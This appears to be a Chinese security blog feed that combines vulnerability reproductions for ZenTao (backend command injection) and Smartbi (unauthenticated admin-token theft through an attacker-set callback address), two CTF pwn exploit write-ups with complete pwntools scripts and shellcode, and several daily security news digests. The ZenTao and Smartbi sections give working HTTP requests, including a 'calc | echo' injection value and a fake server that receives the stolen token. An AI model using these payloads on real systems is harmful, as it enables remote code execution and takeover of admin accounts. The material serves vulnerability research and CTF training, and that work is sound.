禅道后台命令执行漏洞
漏洞简介
禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的 API 可以调用。
禅道后台存在 RCE 漏洞,均存在于历史版本,对这些漏洞进行复现分析。
环境搭建
源码下载地址 https://dl.cnezsoft.com/zentao/18.0.beta1/ZenTaoPMS.18.0.beta1.php7.2_7.4.zip
利用 phpstudy 来进行环境的搭建
漏洞复现
登录后台创建 GitLab 类型的代码库
点击 DevOps 模块的设置选项,修改创建的代码库
点击保存并抓取数据包
修改参数 SCM 和 client SCM 修改为 Subversion client 修改为 calc | echo "
触发了命令执行,执行了两次
####
漏洞分析
发现有一些分析文章中描述需要先创建一个代码仓库,也指出了创建代码仓库的原因,因为调用的是 edit 方法,所以要先 create
经过调试发现这是必须的,因为在没创建代码库时,执行 edit 方法,会提示跳转去创建代码库
module/repo/control.php#commonAction
所以需要先创建代码库
module/repo/control.php#create
module/repo/model.php#create
在创建代码库的时候有一个检查 Client 的操作 只有选择 Gitlab 才能不做客户端的检测操作,直接创建成功
module/repo/model.php#checkClient
创建成功后执行编辑操作触发漏洞
POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1
Host: test.test
Content-Length: 36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=repo&f=edit&repoID=1&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; windowWidth=1440; windowHeight=722; tab=devops; repoBranch=master;XDEBUG_SESSION=PHPSTORM
Connection: close
SCM=Subversion&client= calc | echo "
module/repo/control.php#edit
module/repo/model.php#update
module/repo/model.php#checkConnection
修复建议
更新至最新版本
网络安全日报 2023年08月24日
1、研究人员披露XLoader恶意软件新变体
https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/ XLoader 是一种长期运行的恶意软件即服务信息窃取程序和僵尸网络,自 2015 年以来一直活跃。其第一个 macOS 变体于 2021 年被发现,当时使用Java 程序分发。然而现在,研究人员发现 XLoader 近期的新变种,并且没有依赖项。XLoader 采用 C 和 Objective C 编程语言原生编写,并使用 Apple 开发人员签名,现在伪装成一款名为“Off
2、黑客论坛公开售卖260万Duolingo用户0数据
https://www.bleepingcomputer.com/news/security/scraped-data-of-26-million-duolingo-users-released-on-hacking-forum/ 黑客论坛上泄露了 260 万 DuoLingo 用户的抓取数。数据集昨天在新版 Breached 黑客论坛上发布,需要 8 个站点积分,价值仅为 2.13 美元。攻击者可以利用泄露的信息进行有针对性的网络钓鱼攻击。Duolingo 是世界上最大的语言学习网站之一,全球每月拥有超过 7400 万用户。2023 年 1 月,攻击者在现已关闭的 Breached 黑客论
3、 研究人员披露伪造的亚马逊谷歌广告
https://www.bleepingcomputer.com/news/security/sneaky-amazon-google-ad-leads-to-microsoft-support-scam Google 搜索结果中看似合法的亚马逊广告将访问者重定向到 Microsoft Defender 技术支持骗局,从而锁定了攻击者的浏览器。该恶意广告显示了亚马逊的合法网址,就像该公司的典型搜索结果一样。但是,点击 Google 广告会将用户重定向到一个技术支持骗局,该骗局冒充 Microsoft Defender 发出的警报,欺骗受害者感染了 ads(exe).finacetrack(2
4、美国司法部指控 Tornado Cash 创始人洗钱超过 10 亿美元
https://securityaffairs.com/149804/cyber-crime/tornado-cash-founders-charges.html 美国司法部指控两名男子经营 Tornado Cash 服务并洗钱超过 10 亿美元的犯罪所得。
5、FBI 称朝鲜 Lazarus 是近期加密货币盗窃案的幕后黑手
https://therecord.media/north-korea-lazarus-behind-crypto-heists FBI 将最近针对加密货币平台的三起网络攻击归咎于朝鲜政府的 APT38 黑客组织,该组织被许多研究人员称为Lazarus 或 TraderTraitor。
6、3,000 个 Openfire 服务器遭受针对近期漏洞的攻击
https://www.securityweek.com/3000-openfire-servers-exposed-to-attacks-targeting-recent-vulnerability 漏洞情报公司 VulnCheck 报告称,超过 3,000 台 Openfire 服务器尚未针对最近的漏洞进行修补,仍然容易受到新漏洞的攻击。
7、谷歌发布Chrome 116 安全更新,修复了五个内存安全漏洞
https://www.securityweek.com/first-weekly-chrome-security-update-patches-high-severity-vulnerabilities 谷歌本周宣布了 Chrome 116 安全更新,修复了外部研究人员报告的五个内存安全漏洞,其中包括四个被评为“高严重性”的问题。
8、乌克兰黑客声称泄露了俄罗斯议会副议长的电子邮件
https://therecord.media/ukrainian-hackers-claim-to-leak-emails-of-russia-duma-deputy 乌克兰黑客声称已侵入一名俄罗斯高级政治家的电子邮件账户,并曝光了据称证明他参与洗钱和逃避制裁计划的文件。
9、网络攻击迫使英国数百家零售商业务瘫痪
https://www.secrss.com/articles/57997 英国软件公司 Swan Retail 遭受网络攻击,导致超过 300 家英国商户无法处理付款或完成订单。
10、选民投票受阻?厄瓜多尔国家选举机构遭七国网络攻击
https://therecord.media/ecuador-election-cyberattacks-absentee-voting 厄瓜多尔举行的全国大选因居住在国外的公民难以通过网络投票而受到影响,此次影响的主要原因是因为厄瓜多尔选举机构遭遇了来自七个不同国家的网络攻击。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
smartbi token回调获取登录凭证漏洞
2023年7月28日Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。 于是研究了下相关补丁并进行分析。
0x01分析结果
依据补丁分析,得到如下漏洞复现步骤
第一步,设置EngineAddress为攻击者机器上的http服务地址
首先使用python flask搭建一个fake server,上面只注册了/api/v1/configs/engine/smartbitoken接口,该接口返回一个json响应体
from flask import Flask,jsonify,request
app = Flask(__name__)
@app.route('/api/v1/configs/engine/smartbitoken',methods=["POST"])
def hello():
print(request.json)
return jsonify(hi="jello")
if __name__ == "__main__":
app.run(host="0.0.0.0",port=8000)
使用如下poc,设置EngineAddress为我们的fake server地址http://10.52.32.43:8000,
POST /smartbi/smartbix/api/monitor/setEngineAddress/ HTTP/1.1
Host: 127.0.0.1:18080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 23
http://10.52.32.43:8000
第二步,触发smartbi向我们刚刚设置的EngineAddress外发token
发送如下请求
POST /smartbi//smartbix/api/monitor/token/ HTTP/1.1
Host: 127.0.0.1:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 10
experiment
发送相关请求后,即可在我们的fake server上面看到了携带token的请求
第三步,使用上面获取的token进行登录
POST /smartbi//smartbix/api/monitor/login/ HTTP/1.1
Host: 127.0.0.1:18080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 47
admin_I8ac3b2d10189e80fe80fea750189ed0084f50082
返回true表示登录成功,其中的cookie就是合法的凭证
0x02分析过程
阅读相关补丁,可知此次漏洞与/smartbix/api/monitor/setServiceAddress有关
更进一步查看RejectSmartbixSetAddress类修补的方式,可知与smartbix.datamining.service.MonitorService类的getToken方法有关,该补丁表示如果系统中smartbix.datamining.service.MonitorService存在getToken方法就进行拦截/smartbix/api/monitor/setEngineAddress等一系列接口的请求。
分析smartbix.datamining.service.MonitorService类从头部的注解可知,该类下的所有路由都不需要认证即可访问
定位到getToken方法该方法对应的路由的/token,方法内部生成一个token,并在输入的type参数为experiment是将该token发送到系统配置中配置的ENGINE_ADDRESS
这意味着,只要ENGINE_ADDRESS可控,那么我们就能获取到一个合法的token
由补丁包的路由/smartbix/api/monitor/setServiceAddress定位到setEngineAddress方法可知该方法可以未授权配置ENGINE_ADDRESS
那意味着,只需要调用/smartbix/api/monitor/setServiceAddress接口,将ENGINE_ADDRESS设置为我们可控的伪造服务器,那么就可以从请求报文中获取到token。(这个位置经过尝试,发现伪造服务器上需要实现使用POST方法请求的/api/v1/configs/engine/smartbitoken接口,并且,响应内容为json)获取完token后,就可调用/smartbix/api/monitor/login方法进行登录
0x03其他说明
上述只说明了设置ENGINE_ADDRESS利用的情况,设置SERVICE_ADDRESS进行利用的步骤也和上述类似
网络安全日报 2023年08月23日
1、研究人员披露CypherRAT和CraxsRAT恶意软件开发者身份
https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/ 研究人员揭露了 CypherRAT 和 CraxsRAT 远程访问木马 (RAT) 背后开发人员的真实身份。过去八年中,此人使用“ EVLF DEV ”的在线账号在叙利亚境外开展业务,据信通过向各种威胁行为者出售这两种 RAT 赚取了超过 75,000 美元。此人也是恶意软件即服务 (MaaS) 运营商。在过去的三年里,EVLF 一直在 Surface 网络商店上提供 CraxsRAT,这是目前最危险的 And
2、TP-Link智能灯泡存在漏洞可导致WiFi密码泄露
https://arxiv.org/pdf/2308.09019.pdf 研究人员在 TP-Link Tapo L530E 智能灯泡和 TP-Link Tapo 应用程序中发现了四个漏洞,攻击者可以利用这些漏洞窃取目标的 WiFi 密码。TP-Link Tapo L530E 是包括亚马逊在内的多个市场上最畅销的智能灯泡。TP-link Tapo是一款智能设备管理应用程序,在Google Play上拥有1000万安装量 。最令人担忧的攻击场景是利用漏洞进行灯泡冒充和检索 Tapo 用户帐户详细信息。然后,通过访问 Tapo 应用程序,攻击者可以提取受害者的 WiFi SSID 和密码,并获得连
3、Ivanti警告MobileIron零日漏洞可导致身份验证绕过
https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface?language=en_US 美国 IT 软件公司 Ivanti 警告客户一个关键的 Sentry API 身份验证绕过漏洞正在被利用。Ivanti Sentry(以前称为 MobileIron Sentry)中发现了一个漏洞。此漏洞影响 9.18 及更早版本。该漏洞不会影响其他 Ivanti 产品,例如 Ivanti EPMM 或 Ivanti Neurons for M
4、Akira 勒索团伙以 Cisco VPN 产品为目标来攻击组织
https://securityaffairs.com/149770/malware/akira-ransomware-cisco-vpn.html Akira 勒索软件团伙以 Cisco VPN 产品为目标,以获得对企业网络的初始访问权限并窃取其数据。Akira勒索软件自 2023 年 3 月以来一直活跃,该恶意软件背后的威胁行为者声称已经入侵了多个行业的多个组织,包括教育、金融和房地产。
5、美国政府和国防承包商 Belcan 泄露了超级管理员凭据和敏感数据
https://securityaffairs.com/149779/data-breach/belcan-leaks-admin-password.html Cybernews 研究团队透露,美国政府和国防承包商 Belcan 泄露了其超级管理员凭据。
6、Snatch 勒索软件团伙攻击了南非国防部并窃取了1.6TB数据
https://securityaffairs.com/149760/cyber-crime/snatch-ransomware-department-of-defence-south-africa.html 该团伙声称窃取了军事合同、内部呼号和个人数据,总计 1.6 TB 数据。
7、CISA 警告称,一个Adobe ColdFusion 漏洞被广泛利用
https://www.securityweek.com/cisa-warns-of-another-exploited-adobe-coldfusion-vulnerability/ 美国网络安全和基础设施安全局 (CISA) 警告各组织,今年早些时候修补的 Adobe ColdFusion 漏洞正被利用进行攻击。 该漏洞被追踪为 CVE-2023-26359,CISA 于周一将其添加到其已知可利用漏洞 (KEV) 目录中。
8、MOVEit 攻击狂潮使 Clop 成为今夏最多产的勒索软件
https://www.cybersecuritydive.com/news/clop-one-third-ransomware-attacks/691433/ 根据多份威胁情报报告,7 月份所有勒索软件攻击中有三分之一是由 Clop 发起的,这使得这个出于经济动机的威胁行为者成为今年夏天最多产的勒索软件威胁行为者。
9、Duo持续中断导致Azure Auth身份验证错误
https://status.duo.com/incidents/rw7g0q7ztj8f 思科旗下的多重身份验证 (MFA) 提供商 Duo Security 正在调查持续中断事件,该中断导致身份验证失败和错误。这次中断还导致多个 Duo 服务器出现核心身份验证服务问题,从而在系统范围内的中断中触发 Azure 条件访问集成的 Azure Auth 身份验证错误。虽然 Azure 身份验证问题已自动解决,但客户仍然报告遇到问题,包括登录时身份验证速度缓慢和失败。
10、不法分子向儿童借手表“打电话”,盗走 SIM 卡用于境外电诈
https://www.ithome.com/0/713/676.htm 诈骗分子在借到了孩子的儿童电话手表后,会偷偷将手表内部的 SIM 卡盗走,再将电话卡插入虚拟拨号设备,与境外诈骗团伙勾结,随后海量拨打诈骗电话。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年08月22日
1、研究人员演示欺骗苹果设备并诱骗用户共享敏感数据
https://securityaffairs.com/149711/hacking/spoofing-apple-device.html 在最近的 Def Con 黑客大会上,白帽黑客演示了如何欺骗 Apple 设备并诱骗用户共享敏感数据。使用 iPhone 参加会议的与会者开始看到弹出消息, 提示他们连接 Apple ID 或与附近的 Apple TV 共享密码。安全研究人员表示此行为为了提醒人们“真正关闭”蓝牙(即不是从控制中心关闭),并表示没有收集任何数据,他只是发送不需要配对的蓝牙低功耗 (BLE) 广告数据包。
2、研究人员发现人工智能在攻击行为中使用有限
https://www.mandiant.com/resources/blog/threat-actors-generative-ai-limited 研究人员一直跟踪攻击者对 AI 功能的使用情况以及恶意活动情况。根据研究人员观察得出人工智能在入侵操作中的采用仍然有限,并且主要与社会工程有关。具有不同动机和能力的信息行动参与者在其活动中越来越多地利用人工智能生成的内容,特别是图像和视频,这可能至少部分归因于此类捏造的虚假信息显而易见的应用。预计未来生成式人工智能工具将加速攻击者将人工智能融入信息操作和入侵活动中。
3、CISA遭遇勒索软件攻击后发布远程监控工具计划
https://therecord.media/cisa-jcdc-remote-monitoring-management-plan 美国网络安全防御机构和私营公司之间联合发布了第一个利用远程监控和管理(RMM)工具解决安全问题的计划。RMM 软件通常被全球大多数大型组织的 IT 部门用作远程访问计算机的方式,以帮助安装软件或员工所需的其他服务。近年来,黑客越来越多地利用这些工具(尤其是在政府网络中)作为绕过安全系统并建立对受害者网络的长期访问的简单方法。今年 1 月,美国网络安全和基础设施局 (CISA) 和国家安全局表示,至少两个联邦民事机构通过使用 RMM 软件实施的退款诈骗活动的一
4、BlackCat 勒索软件组织声称攻击了Seiko
https://securityaffairs.com/149734/cyber-crime/blackcat-alphv-ransomware-group-seiko.html BlackCat/ALPHV 勒索软件组织声称对日本手表制造商 Seiko 进行了黑客攻击,并将该公司添加到其数据泄露网站中。
5、Tesla 披露数据泄露影响 75,000 人的个人信息
https://www.securityweek.com/tesla-discloses-data-breach-related-to-whistleblower-leak/ 特斯拉披露了一起影响约 75,000 人的数据泄露事件,但该事件是前员工泄密的结果,而不是恶意网络攻击的结果。
6、国际刑警组织逮捕 14 名涉嫌盗窃 4000 万美元的网络罪犯
https://www.freebuf.com/news/375521.html Bleeping Computer 网站披露,4 月份,国际刑警组织发动了一起为期四个月,横跨 25 个非洲国家的执法行动 “Africa Cyber Surge II”,共逮捕 14 名网络犯罪嫌疑人,摧毁 20000 多个从事勒索、网络钓鱼、BEC 和在线诈骗的犯罪网络。
7、APT29针对北约结盟国家的外交部
https://securityaffairs.com/149620/apt/apt29-used-zulip-chat-app.html 与俄罗斯有关的APT29使用Zulip聊天应用程序针对北约结盟国家外交部的攻击。
8、来自美国教育部的数据在暗网出售
https://thecyberexpress.com/us-department-of-education-data-dark-web/ 暗网上的卖家声称拥有美国教育部的用户名、消费者 ID、代币等。据称美国教育部在暗网上出售数据的真实性无法得到证实。
9、DefCon大会演示黑掉卫星:首次成功移动轨道、劫持摄像头拍照
https://www.secrss.com/articles/57929 今年DEF CON黑客大会在航空航天村举办Hack-A-Sat(黑掉卫星)比赛。该比赛由美国空军发起首个在轨卫星黑客挑战赛。
10、新的苹果iOS 16漏洞在假飞行模式下实现隐形蜂窝访问
https://thehackernews.com/2023/08/new-apple-ios-16-exploit-enables.html 网络安全研究人员在iOS 16上记录了一种新颖的漏洞利用后持久性技术,该技术可能被滥用在飞行模式下并保持对Apple设备的访问,即使受害者认为它处于离线状态。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
ASCII码-shellcode的技巧
网上已经有成熟的工具了,所以就简单记录一下工具怎么用吧
https://github.com/TaQini/alpha3https://github.com/veritas501/ae64.githttps://github.com/rcx/shellcode_encoder结合题目来看吧,没有开启NX保护,基本这类型题目九成九都是shellcode题
程序一开始会让我们在bss段上输入数据,并且判断输入的字符大小是否小于0x1F,再结合NX保护没开启的操作,很容易可以想到此时输入的就是shellcode,而每个字节的不能小于0x1F,那么使用ASCII码shellcode就可以完全绕过了,因为小于0x1F的都是不可见字符
接着再来看题目存在的漏洞,题目存在很明显的UAF漏洞
在选项5中则是留有触发shellcode的条件,只要dword_602440不为0则直接指向我们输入的shellcode,而dword_602440位于bss段,因此默认就为0
而在add函数中,分配堆块又恰好都在unsortbin的范围内,那么思路很清楚了,就是使用unsortbin修改dword_602440的值,那么就能触发shellcode
剩下就是shellcode如何绕过0x1F这个限制,可以看到syscal是\xf\x5,因此syscal都无法绕过这个限制
这里使用ae64这个工具
首先将需要修改的shellcode以二进制的形式导出,这里直接用pwntools生成的shellcode即可
from ae64 import AE64
from pwn import *
context.arch='amd64'
# get bytes format shellcode
shellcode = asm(shellcraft.sh())
# get alphanumeric shellcode
f = open('shellcode','wb+')
f.write(shellcode)
f.close()
接着使用ae64的库直接修改为ASCII码shellcode
from pwn import *
from ae64 import AE64
context.arch = 'amd64'
obj = AE64()
sc = obj.encode(asm(shellcraft.sh()),'rdx')
print(sc)
这里rdx即为shellcode执行的时候call的寄存器
然后就可以生成shellcode了
紧接着拿这段生成的shellcode就可以绕过了
exp
from pwn import *
sh = process("./pwn")
context(arch='amd64')
def add(size):
sh.recvuntil(" choice:")
sh.sendline("1")
sh.recvuntil(" message?")
sh.sendline(str(size))
def delete(index):
sh.recvuntil(" choice:")
sh.sendline("2")
sh.recvuntil("o be deleted?")
sh.sendline(str(index))
def edit(index,content):
sh.recvuntil(" choice:")
sh.sendline("3")
sh.recvuntil(" be modified?")
sh.sendline(str(index))
sh.recvuntil("t of the message?")
sh.sendline(content)
def show(index):
sh.recvuntil(" choice:")
sh.sendline("4")
sh.recvuntil(" to be showed?")
sh.sendline(str(index))
def exp():
sh.recvuntil(" choice:")
sh.sendline("5")
payload = "RXWTYH39Yj3TYfi9WmWZj8TYfi9JBWAXjKTYfi9kCWAYjCTYfi93iWAZj3TYfi9520t800T810T850T860T870T8A0t8B0T8D0T8E0T8F0T8G0T8H0T8P0t8T0T8YRAPZ0t8J0T8M0T8N0t8Q0t8U0t8WZjUTYfi9200t800T850T8P0T8QRAPZ0t81ZjhHpzbinzzzsPHAghriTTI4qTTTT1vVj8nHTfVHAf1RjnXZP"
sh.send(payload)
add(0x81)
add(0x81)
delete(0)
edit(0, p64(0) + p64(0x602440 - 0x10))
add(0x81)
exp()
sh.interactive()
机器切换-shellcode
有时候会遇到题目需要同时使用32位shellcode与64位shellcode,那么如何进行机器切换则成为解题的关键。
CS寄存器则是用于标记机器位数的关键寄存器
CS=0x33,64位
CS=0x23,32位
那么如何修改CS寄存器的值,则需要通过retfq与retf的指令
refq,从64位切换到32位
push 0x23; #32位的CS寄存器的值
push 0xxx; #需要跳转的地址
retfq; #从32位切换到64位
ref,从32位切换至64位
push 0x33; #64的CS寄存器的值
push 0xxx; #需要跳转的地址
retf; #从64位切换到32位
再以一道题目作为例子,保护如下,还是没有开启NX保护
题目漏洞在于,再add函数中可申请11个堆块,而题目中给堆块地址容纳的个数为10,因此申请的第11个堆块的地址则会到length中,从而导致第1个堆块的大小变成了堆块的地址值,造成了堆溢出。
这里有个需要注意的地方是会首先检测存放堆块的位置是否为0,为0才会给该堆块申请的机会,因此第1个堆块的大小必须设置为0,才能够申请到11个堆块。
题目还是用mallopt修改了fastbin的大小为0x10,因此使得无法释放的堆块无法放置到fastbin中,但是mallopt实际是修改了max_global_fast的大小
但是题目存在堆溢出漏洞,因此使用修改Unsortbin的bk指针,修改global_max_fast的即可,这样就可以让堆块放进fastbin中了。
并且允许在bss段上输入数据,且该地址刚好在存放堆块地址的上方,因此伪造虚假堆块在该位置就可以完成任意地址写了。
紧接着修改free函数的got表地址为堆块地址,就可以跳转到shellcode中执行,可以看到堆块地址也是具有可执行权限的。
查看一下禁用了哪些函数,发现只能用read,write以及fstat函数,但是fstat函数对于这道题来说没有用。那么没有open函数,我们就没办法进行orw的利用了。
可以看到fstat函数的64位的系统调用号为5
但是32位下的系统调用号5为open函数
那么如果能切换到32位下执行系统调用为5的系统调用,即可完成open函数的执行,这里就要用到上述的方法使用ref与refq指令完成机器位数的切换。
这里需要注意两个点
(1)在切换为机器位数之后栈顶的地址会被截断为4个字节,因此需要重新调整一下栈顶的地址
(2)在机器位数切换为32位时,在执行系统调用还是会显示原来的函数,但是这个是gdb显示错误,它实际被修改为open函数了
exp
from pwn import *
#sh = process("./pwn")
elf = ELF("pwn")
def user(name,desc):
sh.recvuntil("choice:")
sh.sendline("0")
sh.recvuntil(" name?")
sh.send(name)
sh.recvuntil("desc?")
sh.send(desc)
def add(size):
sh.recvuntil("choice:")
sh.sendline("1")
sh.recvuntil(" message?")
sh.send(str(size))
def delete(index):
sh.recvuntil("choice:")
sh.sendline("2")
sh.recvuntil(" be deleted?")
sh.send(str(index))
def edit(index, offset, content):
sh.recvuntil("choice:")
sh.sendline("3")
sh.recvuntil("ssage to be modified?")
sh.send(str(index))
sh.recvuntil("message to be modified?")
sh.send(str(offset))
sh.recvuntil("ent of the message?")
sh.send(content)
while(1):
try:
sh = process("./pwn")
add(0) #0
add(0) #1
add(0x60)
for i in range(8):
add(0x71)
delete(1)
payload = p64(0)*3 + p64(0x21) + p64(0) + p16(0x37f8 - 0x10)
edit(0,0,payload)
add(9)
delete(2)
delete(3)
delete(4)
delete(5)
user('a'*0x10+p64(0)+p64(0x71),'b')
target = 0x6020f0
payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x71) + p64(target)
edit(0,0,payload)
add(0x60)#2
sh.recvuntil("Ptr: ")
addr = int("0x"+sh.recv(6),16)
log.info("addr:"+hex(addr))
add(0x60)#3
edit(3,0,p64(elf.got['free']))
payload = asm('push 0x23;push '+hex(addr+9)+';retfq', arch='amd64')
payload += asm('mov esp, '+hex(target+0x50)+';push 0x6761;push 0x6c662f2e;push esp;pop ebx; xor ecx,ecx; mov eax,5; int 0x80',arch='i386')
payload += asm('push 0x33;push '+hex(addr+0x2b)+';retf')
payload += asm('mov rdi,rax; mov rsi,0x602080;mov rdx, 0x100;mov rax, 0;syscall;',arch='amd64')
payload += asm('mov rdi,1;mov rax ,1;syscall;',arch='amd64')
edit(2,0,payload)
edit(0,0,p64(addr))
#attach(sh,'b*'+str(addr))
delete(6)
sh.interactive()
except:
continue
网络安全日报 2023年08月21日
1、研究人员披露针对Zimbra用户的大规模钓鱼活动
https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/ 至少从 2023 年 4 月起,一场大规模网络钓鱼活动试图窃取全球 Zimbra Collaboration 电子邮件服务器的凭据。网络钓鱼电子邮件被发送到世界各地的组织,而不是特定针对某些组织或部门。此次行动背后的威胁者目前仍未知。攻击始于一封假装来自组织管理员的网络钓鱼电子邮件,通知用户即将进行电子邮件服务器更新,否则导致帐户暂时停用。
2、谷歌浏览器新功能会提醒用户删除恶意扩展程序
https://thehackernews.com/2023/08/google-chromes-new-feature-alerts-users.html 谷歌宣布计划在即将推出的 Chrome 网络浏览器版本中添加一项新功能,以便在用户安装的扩展程序已从 Chrome 网上应用店中删除时提醒用户。该功能将与 Chrome 117 一起发布,当开发人员取消发布、因违反 Chrome Web Store 政策而删除或标记为恶意软件时,用户可以收到通知。当用户点击‘审核’时,会跳转到扩展程序,并可以选择删除该扩展程序或隐藏警告。
3、WinRAR存在远程代码执行漏洞
https://www.zerodayinitiative.com/advisories/ZDI-23-1152/ WinRAR 是数百万人使用的流行 Windows 文件存档实用程序,只需打开存档即可在计算机上执行命令,该漏洞已修复。该漏洞被追踪为 CVE-2023-40477,在打开特制的 RAR 文件后,远程攻击者可以在目标系统上执行任意代码。由于目标需要诱骗受害者打开存档,因此根据 CVSS,该漏洞的严重性评级降至 7.8。
4、Anonymous组织针对日本核网站发起网络攻击
https://securityaffairs.com/149660/hacking/opfukushima-anonymous.html 黑客组织 Anonymous 对日本与核电相关的组织发起了网络攻击,作为 #OpFukushima 行动的一部分。该活动是为了抗议政府将福岛核电站处理后的放射性水排入大海的计划而发起的。自上个月以来,国际原子能机构在其最终报告中披露该平台后不久,攻击活动就增加了。根据该机构的报告,排放将符合全球安全标准。Anonymous 组织已将目标锁定为日本原子能机构、日本原子能公司和日本原子能协会。目前,Anonymous 组织仅针对目标组织的站点发起分布式拒绝服
5、Junos OS存在多个漏洞可导致远程攻击
https://www.juniper.net/documentation/us/en/software/jweb-ex/jweb-ex-application-package/topics/concept/ex-series-j-web-interface-overview-App.html 网络设备公司 Juniper Networks 发布了一个“周期外”安全更新,以解决 Junos OS 的 J-Web 组件中的多个缺陷,这些缺陷可以组合起来在易受影响的安装上实现远程代码执行。这四个漏洞的累积 CVSS 评级为 9.8。它们影响 SRX 和 EX 系列上所有版本的 Junos OS。
6、攻击者利用压缩算法抵抗安卓APK反编译
https://www.joesandbox.com/analysis/895672/0/html 攻击者分发压缩算法的恶意安卓 APK(打包的应用程序安装程序),这些 APK 使用不受支持、未知或经过大量调整的压缩算法来抵抗反编译。这种方法的主要优点是使用静态分析来逃避安全工具的检测,并妨碍研究人员的分析,从而延迟了对安卓恶意软件菌株如何工作的深入了解。研究人员称有 3300 个 APK 正在使用这些不寻常的反分析方法,这可能会导致其中许多程序崩溃。
7、Jenkins 修补了多个插件中的高危漏洞
https://www.securityweek.com/jenkins-patches-high-severity-vulnerabilities-in-multiple-plugins/ 开源软件开发自动化服务器 Jenkins 本周宣布了针对影响多个插件的高危和中危漏洞的补丁。这些补丁解决了文件夹、Flaky Test Handler 和 Shortcut Job 插件中的三个高严重性跨站点请求伪造 (CSRF) 和跨站点脚本 (XSS) 问题。这些漏洞可能导致信息泄露、凭证泄露、CSRF 攻击、HTML 注入和凭证 ID 枚举。
8、Rust开发者抵制Serde项目发布预编译的二进制文件
https://github.com/serde-rs/serde/issues/2538#issuecomment-1654783988 Serde 是 Rust 数据结构的常用序列化和反序列化框架,它决定将其serde_derive宏作为预编译的二进制文件提供。此行为在开发人员中引起了相当大的抵制,开发者担心如果发布这些二进制文件会导致维护者帐户受到损害。根据 Rust 包注册中心 crates.io 的数据,Serde项目总共已被下载超过 1.96 亿次,而serde_derive 宏的下载量超过 1.71 亿次。
9、"LabRat"恶意挖矿活动滥用 TryCloudflare 来隐藏其 C&C
https://www.securityweek.com/stealthy-labrat-campaign-abuses-trycloudflare-to-hide-infrastructure/ “LabRat”加密货币挖矿和代理劫持操作依赖于基于签名的工具和隐秘的跨平台恶意软件,并滥用 TryCloudflare 来隐藏其 C&C。
10、多家公司对英特尔 CPU 漏洞"Downfall"做出回应
https://www.securityweek.com/companies-respond-to-downfall-intel-cpu-vulnerability/ 多家大公司针对最近披露的名为 Downfall 的 Intel CPU 漏洞发布了安全公告。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年08月18日
1、美国能源公司遭遇大规模二维码网络钓鱼攻击
